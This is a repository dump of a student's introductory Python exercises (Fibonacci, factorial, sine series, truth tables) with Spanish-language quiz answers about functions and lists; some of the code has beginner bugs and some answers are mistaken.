refs/heads/master
2020-04-19T20:04:05.793367
2019-03-27T19:13:16
2019-03-27T19:13:16
168,405,069
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4886363744735718, "alphanum_fraction": 0.5227272510528564, "avg_line_length": 13.5, "blob_id": "5b4b6df1222472036fb1b6cfba1cbfaa62287206", "content_id": "d0bdb009f1931f88aef0ab6cab6a28fe9f5f17ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 89, "license_type": "no_license", "max_line_length": 26, "num_lines": 6, "path": "/Práctica1/NumerosImpares.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "num = int(input(\"Número\"))\ni = 1\nwhile i <= num:\n print(i)\n i = (i*2)+1\nprint(\"Fin\") \n" }, { "alpha_fraction": 0.6220095753669739, "alphanum_fraction": 0.6411483287811279, "avg_line_length": 25.125, "blob_id": "01d535a35fcd76ac9a4725008e79461e14c651cc", "content_id": "a25797d6b4feed678314c5088a3b27a510f0d868", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 212, "license_type": "no_license", "max_line_length": 48, "num_lines": 8, "path": "/Práctica1/Fibonacci.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "num = int(input(\"¿Cuantos terminos necesitas?\"))\nx=0\ny=1\nfor i in range(num):\n print(x)\n t=y #Se va haciendo un bucle\n y=x+y #Def una función para la sucesión\n x=t #Tomando valores de f(n-1) + f(n-2)\n" }, { "alpha_fraction": 0.3691376745700836, "alphanum_fraction": 0.40393343567848206, "avg_line_length": 16.36842155456543, "blob_id": "f91b3b193cbf811e5c8512b13c382808e217b84f", "content_id": "bcccf8bcedc620ad426ec043c2447f2767c98d6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 661, "license_type": "no_license", "max_line_length": 61, "num_lines": 38, "path": "/mylibSeno.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "def factorial(n):\n if n == 0:\n return 1\n else\n return n * factorial(n-1)\n\n\n\ndef seno(x, n):\n i == 0\n suma = 0\n while i <n:\n aux = 2*i + 1\n suma = ((-1)**i/factorial(aux))*x**aux + suma\n i +=1\n return suma\n \nprint(seno(0,6))\n\n\ndef coseno(x, n):\n i = 0\n suma = 0\n while i <n:\n aux = 2*1\n suma = ((-1)**aux/factorial(aux))*x**aux + suma\n i +=1\n return suma\n\nprint(coseno(0,6))\n\n\ndef mult(e,lista):\n new=[]\n for i in lista:\n new.append(i*e)\n return new\nprint(mult(2., [2,3,4]))\n\n" }, { "alpha_fraction": 0.5933504104614258, "alphanum_fraction": 0.5933504104614258, "avg_line_length": 14.600000381469727, "blob_id": "53060b7b1301bfb559ed150bab903db11e932287", "content_id": "72aeb9032dfca4a9f10a3edc58e40b0586f9c445", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 391, "license_type": "no_license", "max_line_length": 47, "num_lines": 25, "path": "/Práctica1/TablasDeVerdad.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "booleanos = [False, True]\n\n#Tabla or\nprint ('x/ty/tx or y') #Los \\t son tabuladores\nfor x in booleanos:\n for y in booleanos:\n print(x, y, x or y, sep = '/t')\n\nprint()\n\n\n#Tabla and \nprint('x/ty/tx and y')\nfor x in booleanos:\n for y in booleanos:\n print (x, y, x and y, sep = '/t')\n\nprint()\n\n#Tabla not\nprint('x/tnot x')\nfor x in booleanos:\n print(x, not x,sep = '/t')\n\nprint() \n" }, { "alpha_fraction": 0.7592644691467285, "alphanum_fraction": 0.7705799341201782, "avg_line_length": 42.10975646972656, "blob_id": "dd91a4d8d04f0b175ecb3fa65af7fc77f6fb8120", 
"content_id": "fd6a15ea89bdc7ddef79965c7b281fcac79cb6fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3626, "license_type": "no_license", "max_line_length": 204, "num_lines": 82, "path": "/Práctica2.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "Funciones\n¿Por qué son ventajosas las funciones para tener en sus programas? \nPorque se pueden llamar en cualquier parte del código y hacer uso de ellas\n\n¿Cuándo se ejecuta el código en una función:cuando se define la función o cuando se llama a la función?\nEl codigo se ejecuta cuando se llama a la funcion que se definio anteriormente y se cumplen las especificaciones\n\n¿Qué enunciado crea una función? \nSe debe poner el comando def seguido del nombre de la función que queremos y dentro de () los argumentos que queremos, ademas de colocar return (argumentos) si queremos que nos devuelva algo dicha función\n\n¿Cuál es la diferencia entre una función y una llamada de función?\nUna función es cuando estas definiendo las variables incluidas en esta y cuando llamas a una función es porque la vas a utilizar en alguna parte del código\n\n¿Cuántos ambitos globales hay en un programa de Python?¿Cuántos ambitos locales?\nSe pueden tener cuantas variables querramos definir, siempre y cuando no tenagn el mismo nombre o se formaria un bucle \n\n¿Qué sucede con las variables en un ámbito local cuando se devuleve la llamada a la función?\nNo aparecen\n\n¿Qué es un valor de retorno?¿Puede un valor de retorno ser parte de una expresión?\nUn valor de retorno es lo que te regresa cuando llamas a una función y dicho valor esta definido dentro de las caracteristicas y puede ser utilizado como parte de una expresion \n\nSi una función no tiene una declaración de retorno, ¿cuál es el valor de retorno de una llamada a es a función?\nLa misma función \n\n¿Cómo puede forzar una variable en una función para referirse a la variable global?\nLlamando a la variable desde dentro \n\n¿Cuál es el tipo de datos de None? \nRepresentan un valor vacío, generalmente se utilizan en return\n\n¿Qué hace la declaración import random?\nLlama a una libreria en la que está definida la función random\n\nSi tuviera una función llamada randint() en un módulo llamado random,¿cómo lo llamaría despues de iimportar random?\nLo llamaría int() dentro de la librería\n\n\nListas y Tuplas\n¿Qué es []?\nSon corchetes que se utilizan para definir valores en una lista\n\n¿Cómo asignaría el valor 'hola' como el tercer valor en una lista almacenada? en una variable llamada spam?\n(Supongamos que el spam contiene [2, 4, 6, 8, 10].Para las siguientes 3 preguntas, digamos que spam contiene la lista [2, 4, 6, 8, 10])\nSe tendría que poner spam[2]= \"hola\" u spam.insert(2,\"hola\")\n\n¿Qué evalua spam[int('3'*2) / 11]?\nSe está multiplicando el valor del índice 3 por 2...(?)\n\n¿Qué evalua spam[-1]?\nEl último termino de la lista\n\n¿Qué evalua spam[: 2]?\nEvalua los elementos de la lista desde el 0 al 2, en este caso 2, 4, 6\n\nPara las siguientes 3 preguntas, digamos que bacon contiene la lista [3.14, 'cat', 11, 'cat', True]\n¿Qué evalua bacon.index('cat')?\nTe da la posicion en la que está la variable 'cat'\n\n¿Qúe evalua bacon.append(99)?\nEscribe una función en este caso 99\n\n¿Qué hace bacon.remove('cat')?\nLO quita de la lista\n\n¿Cuales son los operadores para la concatenacion de listas y la repplicación de listas? 
\nSuma y extend()\n\n¿Cúal es la diferencia entre los métodos de lista append() e insert()?\nCon append se pueden llamar funciones e incluso otras listas completas y con insert variables\n\n¿Cual es la diferencia entre listas y tuplas?\nLa tupla no tiene métodos y no es mutable(no se puede modificar)\n\n\nProyecto Práctico:\n-testprime() que verifique si un número es primo\n#Un número primo es aquel que solo es divisible entre 1 y el mismo\ndef testprime(n)\n int num1\n a==\n for(i=n...\n" }, { "alpha_fraction": 0.7816091775894165, "alphanum_fraction": 0.7816091775894165, "avg_line_length": 20.75, "blob_id": "f30d497419fc05e1fbba3054e9d717c36c15db47", "content_id": "cff90adada30fe3b60916896dba8d53ecd8c6a25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 89, "license_type": "no_license", "max_line_length": 64, "num_lines": 4, "path": "/README.md", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "# Algoritmos\nNancy Alejandra Escamilla Avila \n\nEn este repositorio se añadirá todos los programas para el curso\n" }, { "alpha_fraction": 0.5876288414001465, "alphanum_fraction": 0.6082473993301392, "avg_line_length": 15.166666984558105, "blob_id": "922a9d4d5369c2460c1208d6a51daafa10e94c13", "content_id": "eb30323b79de074e20bf103f73f50c8936bac07a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "no_license", "max_line_length": 26, "num_lines": 6, "path": "/Práctica1/Factorial.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "num = int(input(\"Número\"))\nfac = 1\nfor i in range(num):\n fac = fac*num\n num = num-1\nprint(fac)\n" }, { "alpha_fraction": 0.5491803288459778, "alphanum_fraction": 0.5696721076965332, "avg_line_length": 11.199999809265137, "blob_id": "bf15cf7cd3016b3f2c8905f2cd808f43c664c2af", "content_id": "2645b13ed9e14a2d3d0dec208da46d3e495808c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 29, "num_lines": 20, "path": "/Práctica1/SumaNumerosForyWhile.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "#For\nsuma = 0\nnum = int(input(\"Número\"))\n\nfor i in range(num+1):\n sum = sum + i\nprint(\"suma de número hasta\")\nprint(num)\nprint(\"es:\")\nprint(suma) \n\n#While\ni = 0\nsuma = 0\nwhile i<n:\n print (i)\n i = i +1\n suma = suma +i\n\nprint(suma)\n" } ]
8
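The Práctica2.py notes in the record above end with an unfinished attempt at the testprime() exercise (a function that checks whether a number is prime). A minimal illustrative completion, not the author's solution, is trial division up to the square root:

```python
def testprime(n):
    # A prime number is divisible only by 1 and itself.
    if n < 2:
        return False
    i = 2
    while i * i <= n:        # checking divisors up to sqrt(n) is enough
        if n % i == 0:
            return False
        i += 1
    return True

print(testprime(7))    # True
print(testprime(12))   # False
```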
kavinduchamiran/Mambos-Proxy-Signature
https://github.com/kavinduchamiran/Mambos-Proxy-Signature
c36db661ebb34e49e4809fc19d6e509791dbecba
ad60622fafb3328f22257512f214c0c1e2c12379
534d3e03e2757e8750ddf8cfe6d9898372158988
refs/heads/master
2020-05-26T12:18:17.529948
2019-06-07T03:41:52
2019-06-07T03:41:52
188,228,941
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.30763527750968933, "alphanum_fraction": 0.7779836654663086, "avg_line_length": 31.493976593017578, "blob_id": "b311d3bd4fb5fb2bc14a10e0c93be4a78850888c", "content_id": "4763ba9464c61c287c902cc24f6a59e47b2c0c28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2698, "license_type": "no_license", "max_line_length": 170, "num_lines": 83, "path": "/main.py", "repo_name": "kavinduchamiran/Mambos-Proxy-Signature", "src_encoding": "UTF-8", "text": "import gmpy2 as gm\nimport functions as fn\nimport random\n\n# rs = gm.random_state()\n\n# q = fn.generate_prime(511)\n# p = q*2 + 1\n#\n# while(not gm.is_prime(p)):\n# q = fn.generate_prime(511)\n# p = q * 2 + 1\n#\n# print(q)\n# print(p)\n\nq = gm.mpz(6703903964971298549787012499102923063739682609682746093811160926804801890221671406527729788070298930569933395670018233282113329633315901313810958385152023)\np = gm.mpz(13407807929942597099574024998205846127479365219365492187622321853609603780443342813055459576140597861139866791340036466564226659266631802627621916770304047)\n\n# g = random.randrange(1, p)\n#\n# p1 = gm.powmod(g, q, p)\n# p2 = gm.powmod(g, 2, p)\n#\n# while(p1 == 1 or p2 == 1):\n# g = random.randrange(1, p)\n#\n# p1 = gm.powmod(g, q, p)\n# p2 = gm.powmod(g, 2, p)\n\ng = gm.mpz(8710818255379839923196548866147732015636108867054301571579120201404656816237014445780162103674562653392697980776256695018015245076267408158469291270696559)\n\n# s = random.randrange(1, p-1)\n# v = gm.powmod(g, s, p)\n\ns = gm.mpz(6603076457106034848742957409797976144863570308259298850794007927122882368071832808623387721809154712398085958478809285222917739832130418213190888381666320)\noriginal_private = s\n\nv = gm.mpz(10815388246748225787573331543858716487437979979676928077473442812363936255694810219792839605343315482959547749784354782242081984831399046543073178981168692)\noriginal_public = v\n\nk = random.randrange(1, p-2)\nK = gm.powmod(g, k, p)\n\nk = gm.mpz(934399007794975508151188738151484151961916816169553860202339985884764541480857959125079975808439200383790758038133259931519923138325313821515533581351682)\nK = gm.mpz(3970790412583064084756949362240295935927251035110845543874273568343077539733199222646540796388072296031096069412048165264625345860706440741872236283170790)\n\n# sigma = (s + k * K) % (p - 1)\n\nsigma = gm.mpz(1599844828480432996670936450307491188612511817228907936025817182927186568673377894841834068826933399374833623579771859973397175895631949922313558451139090)\nproxy_private = sigma\n\nlhs = gm.powmod(g, sigma, p)\n\ntemp = gm.powmod(K, K, p)\nrhs = (v * temp) % p\n\nproxy_public = rhs\n\nprint(lhs == rhs)\n\n\nm = 12345678\n\n(ori_r, ori_sig) = fn.sign(m, g, original_private, p)\nori_verify = fn.verify(p, g, original_public, ori_r, ori_sig, m)\n\nprint(ori_verify)\n\n(proxy_r, proxy_sig) = fn.sign(m, g, proxy_private, p)\nproxy_verify = fn.verify(p, g, proxy_public, proxy_r, proxy_sig, m)\n\nprint(proxy_verify)\n\n(ori_r, ori_sig) = fn.sign(m, g, original_private, p)\nori_verify = fn.verify(p, g, proxy_public, ori_r, ori_sig, m)\n\nprint(ori_verify)\n\n(proxy_r, proxy_sig) = fn.sign(m, g, proxy_private, p)\nproxy_verify = fn.verify(p, g, original_public, proxy_r, proxy_sig, m)\n\nprint(proxy_verify)\n\n" }, { "alpha_fraction": 0.49504950642585754, "alphanum_fraction": 0.5473833084106445, "avg_line_length": 19.22857093811035, "blob_id": "a92c7018e69d0481231575f0a3ee303024bed165", "content_id": "ae43731e9011baba6d13991da222e65afbd1d259", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 707, "license_type": "no_license", "max_line_length": 47, "num_lines": 35, "path": "/functions.py", "repo_name": "kavinduchamiran/Mambos-Proxy-Signature", "src_encoding": "UTF-8", "text": "import gmpy2\nimport random\n\nrand_state = gmpy2.random_state(42)\n\ndef generate_prime(bits):\n temp = gmpy2.mpz_rrandomb(rand_state, bits)\n return gmpy2.next_prime(temp)\n\n\ndef sign(m, alpha, a, p):\n k = random.randrange(1, p-2)\n\n while(gmpy2.gcd(k, p-1) != 1):\n k = random.randrange(1, p - 2)\n\n r = gmpy2.powmod(alpha, k, p)\n\n temp1 = gmpy2.powmod(k, -1, p - 1)\n temp2 = (m - a * r) % (p - 1)\n\n s = (temp1 * temp2) % (p - 1)\n return (r, s)\n\ndef verify(p, alpha, y, r, s, m):\n if not(1 <= r and r <= p-1):\n return 0\n\n temp1 = gmpy2.powmod(r, s, p)\n temp2 = gmpy2.powmod(y, r, p)\n v1 = (temp1*temp2) % p\n\n v2 = gmpy2.powmod(alpha, m, p)\n\n return v1 == v2" } ]
2
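main.py in the record above builds the proxy key as sigma = (s + k*K) mod (p-1) and accepts the delegation when g^sigma equals v * K^K mod p; the check works because g^sigma = g^s * (g^k)^K = v * K^K (mod p). Below is a small self-contained sketch of that identity; the 61-bit Mersenne prime and generator are assumptions chosen for speed, not the 512-bit parameters hard-coded in the record.

```python
from random import randrange

p = 2**61 - 1                  # toy Mersenne prime, illustration only
g = 3

s = randrange(1, p - 1)        # original signer's private key
v = pow(g, s, p)               # original signer's public key
k = randrange(1, p - 1)        # delegation nonce
K = pow(g, k, p)               # delegation commitment given to the proxy

sigma = (s + k * K) % (p - 1)  # proxy private key (Mambo-style delegation)

# g^sigma == g^s * g^(k*K) == v * K^K  (mod p)
assert pow(g, sigma, p) == (v * pow(K, K, p)) % p
print("proxy delegation check holds")
```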
mbortoli/FashioNet
https://github.com/mbortoli/FashioNet
7f66adacd99775a41141c9518088de36c526ecc1
5b5ddaaf3c3960d091f870844619522293e16ec5
949871ac48700d56c366b668b596204787dae136
refs/heads/master
2020-06-01T18:33:04.896002
2019-06-08T14:29:52
2019-06-08T14:29:52
190,883,417
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7573117613792419, "alphanum_fraction": 0.7803360223770142, "avg_line_length": 63.279998779296875, "blob_id": "e538adb294e261c8ddfefafa9e2318bced0e2fdd", "content_id": "85d6db0f9fbc76d3e5749aadb845c74091fdbef2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3266, "license_type": "no_license", "max_line_length": 353, "num_lines": 50, "path": "/README.md", "repo_name": "mbortoli/FashioNet", "src_encoding": "UTF-8", "text": "# FashioNet\n\nO projeto nasceu como uma ideia simples para apresentarmos ao final do curso ao lembrarmos de um pedido antigo (mas recorrente) da minha irmã: Aplicativo igual ao que aparece no filme \"As patricinhas de Beverly Hills\".\n\n![eu sei, eu sei...](https://badulakit.files.wordpress.com/2013/07/closet-cher.jpg)\n\nA idéia basica é tentar classificar se a parte de cima da roupa (i.e. camiseta) combina com a parte de baixo (i.e., calça ou bermuda).\n\nInfelizmente ~~(ou felizmente)~~ não temos como digitalizar todas as roupas, mas podemos tirar foto de algumas peças para utilizar no _dataset_. Ele foi criado dessa forma a partir das roupas que possuímos.\n\nCom as imagens preparadas, utilizamos a biblioteca `fastai` para treinar duas arquiteturas: _ResNet34_ e _ResNet50_. Dessa forma foi possível consolidar os conhecimentos adquiridos durante o curso e comparar as duas arquiteturas. Acreditavamos que a arquitetura mais complexa pudesse classificar melhor, mas isso não foi observado nos resultados finais.\n\nNo final, observamos que a arquitetura _ResNet34_ sobressaiu à _ResNet50_, algo que foi verificado **somente** ao expô-las à imagens não utilizadas no treinamento e validação. Esse passo demonstra a importância de testar os modelos.\n\n# Cadernos\n\nEstão localizados dentro da pasta [`src`](src), sendo: \n* [`nb-train-resnet34.ipynb/nb-train-resnet34.ipynb`](src) - Treinamento da resnet34\n* [`nb-train-resnet50.ipynb`](src/nb-train-resnet50.ipynb) - Treinamento da resnet50\n* [`testing.ipynb`](src/testing.ipynb) - Testando a rede com imagens não vistas\n* [`make-labels.ipynb`](src/make-labels.ipynb) - `Widget` para auxiliar na classificação manual das imagens\n\n\n# O _dataset_\n\nForam tiradas fotos das peças individuais, resultando em 19 peças superiores e 15 peças inferiores, que depois foram cortadas para centralizar cada peça. Então combinamos as peças superiores com as inferiores, gerando um total de 285 pares, sendo utilizados 75% para treinamento e 25% para validação.\n\nApós treinamento, também geramos 12 combinações a mais para serem utilizadas no teste das redes.\n\nTodas as imagens resultantes foram redimensionadas para 250x250 pixels para melhor performance da rede - mas você pode testar as originais continas na pasta [`dataset/v1`](dataset/v1) e ver como elas se saem com as mesmas transformações aplicadas pela `fastai` :-)\n\nNesse sentido, o arquivo [`labeled_v2.csv`](labeled_v2.csv) foi criado através do caderno [`make-labels`](src/make-labels.ipynb), onde contém as classificações corretas para cada imagem - com ajuda externa (obivamente eu sou o meu publico alvo).\n\nExemplo de algumas imagens geradas:\n\n![IMG](dataset/v2-resized/IMG_8723.JPG-IMG_8747.JPG) ![IMG](dataset/v2-resized/IMG_8723.JPG-IMG_8749.JPG)\n\nVocê consegue dizer qual combina e qual não combina? 
Se você não consegue, essa ideia também é para você!\n\n# Dependências\n\nPara executar os cadernos se faz necessário a biblioteca [`fastai v1`](https://github.com/fastai/fastai).\n\n# Observações\n\nReconheço que o código esteja meio sujo e pretendo melhorar isso com o tempo.\n\n\n# Terminamos com uma foto do maior estilista de todos os tempos\n![](https://www.agoralaguna.com.br/wp-content/uploads/2019/04/cantor-falcao.jpg)\n" }, { "alpha_fraction": 0.6232081651687622, "alphanum_fraction": 0.6259385943412781, "avg_line_length": 35.20512771606445, "blob_id": "204f8a8b29c2da7e50ed89783ac808b0de9a7bf8", "content_id": "21a94a1b5cb7fa976331acd3a409727495cac9ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1465, "license_type": "no_license", "max_line_length": 150, "num_lines": 39, "path": "/src/image_labeler.py", "repo_name": "mbortoli/FashioNet", "src_encoding": "UTF-8", "text": "from ipywidgets import widgets, Layout\r\nfrom IPython.display import clear_output, display\r\nfrom enum import Enum\r\n\r\n__all__ = ['ImageLabeler', 'SelectionTypeEnum']\r\n\r\nclass SelectionTypeEnum(Enum):\r\n \"\"\"\r\n Types allowed for label selection.\r\n \"\"\"\r\n OPEN_FIELD = 1\r\n MULTIPLE = 2\r\n ONLY_ONE = 3\r\n\r\nclass ImageLabeler():\r\n \"\"\"\r\n Displays images for labeling or deletion and saves them in `path` as 'labeled.csv'.\r\n Based on image_cleaner.py from fastai. \r\n `https://github.com/fastai/fastai/blob/master/fastai/widgets/image_cleaner.py`\r\n \"\"\"\r\n def __init__(self, path, batch_size:int=5, default_label:str='', label_options=[], selection_type:SelectionTypeEnum=SelectionTypeEnum.OPEN_FIELD):\r\n self._images_paths = [path + f for f in listdir(path)]\r\n self._batch_size = batch_size\r\n self._default_label = default_label\r\n self._label_options = label_options\r\n self._selection_type = selection_type\r\n self._csv_dict = dict()\r\n self.render()\r\n\r\n @classmethod\r\n def render(self):\r\n \"Re-render Jupyter cell for batch of images.\"\r\n clear_output()\r\n self.write_csv()\r\n if self.empty():\r\n return display('No more images to label')\r\n else:\r\n display(self.make_horizontal_box(self.get_widgets(self._duplicates)))\r\n display(self.make_button_widget('Next Batch', handler=self.next_batch, style=\"primary\"))\r\n \r\n" }, { "alpha_fraction": 0.6552197933197021, "alphanum_fraction": 0.6607142686843872, "avg_line_length": 37.31578826904297, "blob_id": "abc2ee2ed56d71c87eb53a4e1d1a50ac9cefe8f0", "content_id": "8f8f4cb551dd2874f515105ed22b5262f7ebde04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 728, "license_type": "no_license", "max_line_length": 103, "num_lines": 19, "path": "/src/resizeImages.py", "repo_name": "mbortoli/FashioNet", "src_encoding": "UTF-8", "text": "from os import listdir\nfrom os.path import isfile, join\nimport numpy as np\nfrom PIL import Image\n\npath = 'Images/'\nresized = path+'resized/'\ncombined = path+'combined/'\nupper_files = [combined + f for f in listdir(combined) if f.startswith('IMG')]\nbottom_files = [cropped_bottom + f for f in listdir(cropped_bottom) if isfile(join(cropped_bottom, f))]\nfor u in upper_files:\n upper_image = Image.open(u)\n for b in bottom_files:\n print(u, b)\n bottom_image = Image.open(b)\n combined_image = np.vstack([upper_image, bottom_image])\n #print(combined_image)\n combined_image = Image.fromarray(combined_image)\n combined_image.save(combined + u.split('/', 1)[1] + '-' + b.split('/', 
1)[1])\n" }, { "alpha_fraction": 0.6759259104728699, "alphanum_fraction": 0.6898148059844971, "avg_line_length": 42.20000076293945, "blob_id": "9666eb5fff24f3e138ac0c0a86e1811c2b761475", "content_id": "71acf6a7e17cb8b05b3b996403578f64d59d3ba7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 864, "license_type": "no_license", "max_line_length": 103, "num_lines": 20, "path": "/src/combinarImagens.py", "repo_name": "mbortoli/FashioNet", "src_encoding": "UTF-8", "text": "# https://stackoverflow.com/questions/30227466/combine-several-images-horizontally-with-python\nfrom os import listdir\nfrom os.path import isfile, join\nimport numpy as np\nfrom PIL import Image\n\ncropped_upper = 'cropped_upper/'\ncropped_bottom = 'cropped_bottom/'\ncombined = 'combined/'\nupper_files = [cropped_upper + f for f in listdir(cropped_upper) if isfile(join(cropped_upper, f))]\nbottom_files = [cropped_bottom + f for f in listdir(cropped_bottom) if isfile(join(cropped_bottom, f))]\nfor u in upper_files:\n upper_image = Image.open(u)\n for b in bottom_files:\n print(u, b)\n bottom_image = Image.open(b)\n combined_image = np.vstack([upper_image, bottom_image])\n #print(combined_image)\n combined_image = Image.fromarray(combined_image)\n combined_image.save(combined + u.split('/', 1)[1] + '-' + b.split('/', 1)[1])\n" } ]
4
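The FashioNet README above describes training ResNet34 and ResNet50 with fastai on the 250x250 pair images, with labels in labeled_v2.csv and a 25% validation split. A rough sketch of that setup with the fastai v1 API follows; the CSV column layout, the transforms, batch size and epoch count are assumptions, and the repository's own notebooks in src/ hold the actual training code.

```python
from fastai.vision import *

# Assumed layout: labeled_v2.csv maps each pair image to a match / no-match label.
data = ImageDataBunch.from_csv(
    '.', folder='dataset/v2-resized', csv_labels='labeled_v2.csv',
    valid_pct=0.25, size=250, ds_tfms=get_transforms(), bs=16)

learn = cnn_learner(data, models.resnet34, metrics=accuracy)  # models.resnet50 for the larger net
learn.fit_one_cycle(4)
learn.save('fashionet-resnet34')
```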
mikekitckchan/CCAttack
https://github.com/mikekitckchan/CCAttack
33b38110856a9ca708e491cbd940e30ea05d0046
8d9e54217dae81450fc5204b0ceb8af61441d991
6de05d49c2acd47e27702be00af9cd8f753a69e9
refs/heads/master
2020-07-05T11:05:12.978198
2019-08-16T00:57:45
2019-08-16T00:57:45
202,632,618
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6648865938186646, "alphanum_fraction": 0.6824067234992981, "avg_line_length": 45.33898162841797, "blob_id": "c7fede87657c6db343c754aa7c313e36928b6e65", "content_id": "2e5f99edd3f5cbdb2ddf658044a37d1e5b5814a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27812, "license_type": "no_license", "max_line_length": 249, "num_lines": 590, "path": "/cc.py", "repo_name": "mikekitckchan/CCAttack", "src_encoding": "UTF-8", "text": "import socket\nimport socks\nimport threading\nimport random\nimport re\nimport urllib.request\nimport os\nimport sys\nfrom bs4 import BeautifulSoup\n\n\ntry: # se si è sotto linux scapy (per l'attacco tcp-udp) funziona\n\tfrom scapy.all import * # importa scapy\nexcept: # altrimenti, se fallisce l'importazione\n\tprint (\"在此系统下不支持TCP / UDP洪水。 你必须使用HTTP.\") # printa questo\n\nprint('''\nby INDDOS\nEdited by caoip.com\n\t''') # Author and Editor\n\n\nuseragents=[\"AdsBot-Google ( http://www.google.com/adsbot.html)\",\n\t\t\t\"Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)\",\n\t\t\t\"Baiduspider ( http://www.baidu.com/search/spider.htm)\",\n\t\t\t\"Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)\",\n\t\t\t\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0\",\n\t\t\t\"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G35 Safari/601.1\",\n\t\t\t\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36)\",\n\t\t\t\"Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.117 Safari/537.36 Puffin/7.1.2.18064AP\",\n\t\t\t]\n\n\ndef starturl(): # Set a function for attack\n\tglobal url\n\tglobal url2\n\tglobal urlport\n\n\turl = input(\"\\n请输入网址: \").strip()\n\n\tif url == \"\":\n\t\tprint (\"请输入网址.\")\n\t\tstarturl()\n\n\ttry:\n\t\tif url[0]+url[1]+url[2]+url[3] == \"www.\":\n\t\t\turl = \"http://\" + url\n\t\telif url[0]+url[1]+url[2]+url[3] == \"http\":\n\t\t\tpass\n\t\telse:\n\t\t\turl = \"http://\" + url\n\texcept:\n\t\tprint(\"你错了,再试一次.\")\n\t\tstarturl()\n\n\ttry:\n\t\turl2 = url.replace(\"http://\", \"\").replace(\"https://\", \"\").split(\"/\")[0].split(\":\")[0]\n\texcept:\n\t\turl2 = url.replace(\"http://\", \"\").replace(\"https://\", \"\").split(\"/\")[0]\n\n\ttry:\n\t\turlport = url.replace(\"http://\", \"\").replace(\"https://\", \"\").split(\"/\")[0].split(\":\")[1]\n\texcept:\n\t\turlport = \"80\"\n\n\tfloodmode()\n\ndef floodmode(): # The choice of mode\n\tglobal choice1\n\tchoice1 = input('你的目标是 ' + url + \" 输入“0”进行确认:\")\n\tif choice1 == \"0\":\n\t\tproxymode()\n\telif choice1 == \"1\":\n\t\ttry:\n\t\t\tif os.getuid() != 0: # check if ROOT permission is enable\n\t\t\t\tprint(\"您需要以root身份运行此程序才能使用TCP / UDP泛洪.\") # printa questo\n\t\t\t\texit(0) # exit\n\t\t\telse: # otherwise\n\t\t\t\tfloodport() # continue\n\t\texcept:\n\t\t\tpass\n\telif choice1 == \"2\":\n\t\ttry:\n\t\t\tif os.getuid() != 0:\n\t\t\t\tprint(\"您需要以root身份运行此程序才能使用TCP / UDP泛洪.\")\n\t\t\t\texit(0)\n\t\t\telse:\n\t\t\t\tfloodport()\n\t\texcept:\n\t\t\tpass\n\telse:\n\t\tprint (\"你错了,再试一次.\")\n\t\tfloodmode()\n\ndef floodport():\n\tglobal port\n\ttry:\n\t\tport = int(input(\"输入要测试的端口: \"))\n\t\tportlist = range(65535)\n\t\tif port in portlist:\n\t\t\tpass\n\t\telse:\n\t\t\tprint (\"你错了,再试一次.\")\n\t\t\tfloodport()\n\texcept ValueError:\n\t\tprint (\"你错了,再试一次.\") # printa 
